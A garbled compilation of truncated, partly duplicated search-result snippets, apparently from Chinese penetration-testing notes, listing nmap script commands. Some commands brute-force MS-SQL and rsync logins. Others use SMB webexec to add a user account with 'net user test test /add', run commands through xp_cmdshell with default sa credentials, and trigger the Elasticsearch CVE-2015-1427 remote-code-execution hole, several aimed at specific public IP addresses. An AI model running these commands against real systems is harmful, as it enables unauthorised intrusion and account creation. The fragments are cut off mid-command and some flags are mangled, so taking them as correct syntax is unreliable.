nmap --script"smb-vuln-webexec"--script-args'smbusername=msfadmin,smbpass=msfadmin,webexec_command=net user test test /add'-p139,445192.168.174.132 nmap --script"smb-vuln-webexec"--script-args'smbusername=msfadmin,smbpass=msfadmin,webexec_gui_command=cmd'-p139,445192.168.174.132 519. smtp...
nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153 验证cve2014-8877漏洞 nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128 验证低安全的 SSHv1,sslv2协议 nmap --script sshv...
nmap —script=http-vuln-cve2015-1427 —script-args command=‘ls’ +ip[验证Elasticsearch未授权访问漏洞] nmap -p 873 —script rsync-brute —script-args ‘rsync-brute.module=www’ [验证Rsync未授权访问漏洞] nmap -p 6379 —script redis-info 192.168.230.128 可以探测该主机是否存在Redis未授权访问 这...
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.16911 xp_cmdshell 执行命令 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 1...
nmap -sV -(-)script http-vuln-cve2015-1635 +ip[验证http.sys远程代码执行漏洞] nmap -sV —script=ssl-heartbleed +ip[验证心脏出血漏洞] nmap -p 27017 —script mongodb-info +ip[验证Mongodb未授权访问漏洞] nmap —script=http-vuln-cve2015-1427 —script-args command=‘ls’ +ip[验证Elasticsearc...
$ nmap -sV -script=smtp-strangeport 192.168.188.188 检查是否存在漏洞 $ nmap --script=vuln 192.168.188.188 SCTP INIT Ping扫描 $ nmap -PY -v 192.168.188.188 获得PHP版本信息 $ nmap -sV -script=http-php-version 192.168.188.188 信息收集扫描 ...
nmap --script mysql-empty-password 203.195.139.153 10 验证cve2015-1427 漏洞 nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153 11 验证cve2014-8877漏洞 nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877...
nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153 16、验证 cve2014-8877 漏洞 nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128 ...
nmap –script mysql-empty-password 203.195.139.153 10 验证cve2015-1427 漏洞nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153 11 验证cve2014-8877漏洞nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=...
nmap --script mysql-empty-password 203.195.139.153 10 验证cve2015-1427 漏洞 nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153 11 验证cve2014-8877漏洞 nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877...